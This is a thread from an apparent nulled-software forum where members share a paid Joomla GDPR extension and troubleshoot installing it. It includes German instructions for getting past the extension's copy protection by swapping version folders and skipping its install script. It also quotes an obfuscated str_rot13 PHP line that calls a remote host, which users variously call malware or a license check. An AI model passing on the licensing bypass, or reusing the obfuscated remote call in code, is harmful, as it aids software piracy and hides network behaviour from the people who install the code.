GDPR Component 2.16 (Joomla 3/4/5)

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
  • New feature to set a specific description type for cookies, domains, resources, etc
  • New feature to send a confirmation email to users requesting to export and delete profile
  • Bugs fix

These are original files
 

Attachments

  • gdpr_v2.16_forjoomla3.x.zip
    897.9 KB · Views: 5
  • gdpr_v2.16_forjoomla5.x_4.x.zip
    891.3 KB · Views: 11

Novo

Member
XNullUser
Joined
Oct 27, 2021
Messages
56
Reaction score
11
Points
8
NullCash
78
Thank you so much derGOTTkenner, I have had problems installing this version, I guess they were not the original files, I am going to try this one that you are sharing.
 

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
Thank you so much derGOTTkenner, I have had problems installing this version, I guess they were not the original files, I am going to try this one that you are sharing.
These files should work. I had the same problem with version 2.15.
 

vourlismenos

Member
XNullUser
Joined
Oct 20, 2022
Messages
30
Reaction score
3
Points
8
NullCash
50
Thank you for this version. I'll try it as well. Previous version didn't work :/
Post automatically merged:

update: still now working in joomla 5.2.3 - same error: Extension Update: Custom install routine failure.
 
Last edited:

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
Thank you for this version. I'll try it as well. Previous version didn't work :/
Post automatically merged:

update: still now working in joomla 5.2.3 - same error: Extension Update: Custom install routine failure.
I don't quite understand.
Is version 2.16 working for you or not?
Because you can't open the ZIP file and repack it.
Otherwise you'll get an installation error
Post automatically merged:

Ich konnte Folgendes in Erfahrung bringen.
Die Dateien haben einen Kopierschutz.
Aber ich denke ich habe eine Lösung gefunden.
Ihr braucht:
gdpr_v2.14_forjoomla5.x_4.x
gdpr_v2.16_forjoomla5.x_4.x
Beide Dateien entpacken.
Die Ordner:
admin
plugins
site
von Version 2.16 in der Version 2.14 ersetzen.
Dann noch das Datum un die Versionsnummer in der gdpr.xml anpassen. Neu als ZIP verpacken.
FERTIG
 
Last edited:

vourlismenos

Member
XNullUser
Joined
Oct 20, 2022
Messages
30
Reaction score
3
Points
8
NullCash
50
I don't quite understand.
Is version 2.16 working for you or not?
Because you can't open the ZIP file and repack it.
Otherwise you'll get an installation error
Post automatically merged:

Ich konnte Folgendes in Erfahrung bringen.
Die Dateien haben einen Kopierschutz.
Aber ich denke ich habe eine Lösung gefunden.
Ihr braucht:
gdpr_v2.14_forjoomla5.x_4.x
gdpr_v2.16_forjoomla5.x_4.x
Beide Dateien entpacken.
Die Ordner:
admin
plugins
site
von Version 2.16 in der Version 2.14 ersetzen.
Dann noch das Datum un die Versionsnummer in der gdpr.xml anpassen. Neu als ZIP verpacken.
FERTIG
It didn't work for me when I tried to install it - 2.16. I got the error I mentioned.
I'll try repacking it the way you describe
Post automatically merged:

ok just realised that this process will basically overwrite ALL files from version 2.16 with the ones from 2.14
Doesn't that just negates any changes from the newest version?
 
Last edited:

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
It didn't work for me when I tried to install it - 2.16. I got the error I mentioned.
I'll try repacking it the way you describe
Post automatically merged:

ok just realised that this process will basically overwrite ALL files from version 2.16 with the ones from 2.14
Doesn't that just negates any changes from the newest version?
Ich habe es getestet und es funktioniert.
gdpr.xml (Nicht kopieren sondern anpassen)
installscript.php (Nicht kopieren)
Nur die Ordner mit dem gemsammten Inhalt:
admin - plugins - siteGDPR.png
 

vourlismenos

Member
XNullUser
Joined
Oct 20, 2022
Messages
30
Reaction score
3
Points
8
NullCash
50
Ich habe es getestet und es funktioniert.
gdpr.xml (Nicht kopieren sondern anpassen)
installscript.php (Nicht kopieren)
Nur die Ordner mit dem gemsammten Inhalt:
admin - plugins - siteView attachment 133860
yes but this way you are installing gdpr 2.14. The files are from that version.
You just changed the version number so it displays 2.16
 

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
yes but this way you are installing gdpr 2.14. The files are from that version.
You just changed the version number so it displays 2.16
No. It is then the new version.
Assuming they have exchanged the data.
I have no idea what kind of copy protection they have.
But it is probably due to the installscript.php
That was the case for me. I could no longer install the original data after 2 days.
 

01K

Member
XNullUser
Joined
Dec 24, 2020
Messages
110
Reaction score
14
Points
18
NullCash
123
regarding "Extension Update: Custom install routine failure."
check the installation script , it has potential malware:
Code:
  $cdFuncUsed = 'str_' . 'ro' . 't' . '13';
            $url = $cdFuncUsed ( 'uggc' . '://' . 'fgberwrkgrafvbaf' . '.bet' . '/TQCE1406VSPQnotq4844712323njnlv35td1tena4486i.ugzy' );
Once removed , you could install, But there are qestions which intentions does this zip archive have to do. Seems to be a virus.
 

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
regarding "Extension Update: Custom install routine failure."
check the installation script , it has potential malware:
Code:
  $cdFuncUsed = 'str_' . 'ro' . 't' . '13';
            $url = $cdFuncUsed ( 'uggc' . '://' . 'fgberwrkgrafvbaf' . '.bet' . '/TQCE1406VSPQnotq4844712323njnlv35td1tena4486i.ugzy' );
Once removed , you could install, But there are qestions which intentions does this zip archive have to do. Seems to be a virus.
With all due respect. This statement is false!
I bought the extension and shared the ORIGINAL file here.
The code snippet is in the original file.
I can't imagine that the developers of the extension would insert malicious code to harm their customers.
Addendum.
The code snippet can also be found in version 2.14.
 

01K

Member
XNullUser
Joined
Dec 24, 2020
Messages
110
Reaction score
14
Points
18
NullCash
123
With all due respect. This statement is false!
I bought the extension and shared the ORIGINAL file here.
The code snippet is in the original file.
I can't imagine that the developers of the extension would insert malicious code to harm their customers.
Addendum.
The code snippet can also be found in version 2.14.
And that's pretty strange, why the dev inserts such code, I found out that's the same code in in JSitemap cmponent too.

Check this function:
Code:
       public function isn($uvn) {
}

As the archive which the script is pulling is unavailable, we get the "Extension Install: Custom install routine failure." error.
Removing that code gives the possibility to install the plugin. But who knows, maybe there are more strange code snippets inside...
As this encrypted zip file is unavailable it's impossible to predict what was inside. Maybe with the newest version, it will be possible to examine.
Would be nice, if someone with coding experience would comment this
 

derGOTTkenner

Well-known member
Master
Diamond
Elite
XNullUser
Joined
Jan 26, 2022
Messages
309
Reaction score
515
Points
93
NullCash
3,948
And that's pretty strange, why the dev inserts such code, I found out that's the same code in in JSitemap cmponent too.

Check this function:
Code:
       public function isn($uvn) {
}

As the archive which the script is pulling is unavailable, we get the "Extension Install: Custom install routine failure." error.
Removing that code gives the possibility to install the plugin. But who knows, maybe there are more strange code snippets inside...
As this encrypted zip file is unavailable it's impossible to predict what was inside. Maybe with the newest version, it will be possible to examine.
Would be nice, if someone with coding experience would comment this
That's nonsense.
The code snippet in question already exists in version 2.14 or even older. Therefore, this cannot be the problem.
From version 2.15 onwards there were other changes in installscript.php.
Think about it carefully. Which developer is so stupid as to cheat their customers. And what also speaks against your theory. There is not a SINGLE post on this topic in the official forum.
Someone would have reported there long ago and complained.
Besides. What advantage would there be in telling the script to download a ZIP file? EVERY customer would notice this immediately after using the code
 

vourlismenos

Member
XNullUser
Joined
Oct 20, 2022
Messages
30
Reaction score
3
Points
8
NullCash
50
regarding "Extension Update: Custom install routine failure."
check the installation script , it has potential malware:
Code:
  $cdFuncUsed = 'str_' . 'ro' . 't' . '13';
            $url = $cdFuncUsed ( 'uggc' . '://' . 'fgberwrkgrafvbaf' . '.bet' . '/TQCE1406VSPQnotq4844712323njnlv35td1tena4486i.ugzy' );
Once removed , you could install, But there are qestions which intentions does this zip archive have to do. Seems to be a virus.
I googled a bit about this.
I found a couple of results in a Russian and a Chinese forum (not a good sign).
In the Russian forum they were also wandering what that is. In the Chinese forum they said that it's a license check.

No expert, just mentioning what I googled.
 

01K

Member
XNullUser
Joined
Dec 24, 2020
Messages
110
Reaction score
14
Points
18
NullCash
123
Download dosnt works for me. i liked 3 time, 30 points and i cant download it:-(

I found a couple of results in a Russian and a Chinese forum (not a good sign).
In the Russian forum they were also wandering what that is. In the Chinese forum they said that it's a license check.
Could you please quote some messages from Chinese forum? And what did they suggest?
 

vourlismenos

Member
XNullUser
Joined
Oct 20, 2022
Messages
30
Reaction score
3
Points
8
NullCash
50
Could you please quote some messages from Chinese forum? And what did they suggest?
They didn't suggest anything specific. They were just discussing if it was a virus or something similar.
It was also mentioned in those forums, that they have seen the code in other extensions as well.

It was hard to follow because auto translation is not the best, especially for languages like chinese.
Screenshot 2025-02-19 at 14-47-38 Passed from 1 5 to 3 8 1 but no Xmap on it and how to replac...png
 
Top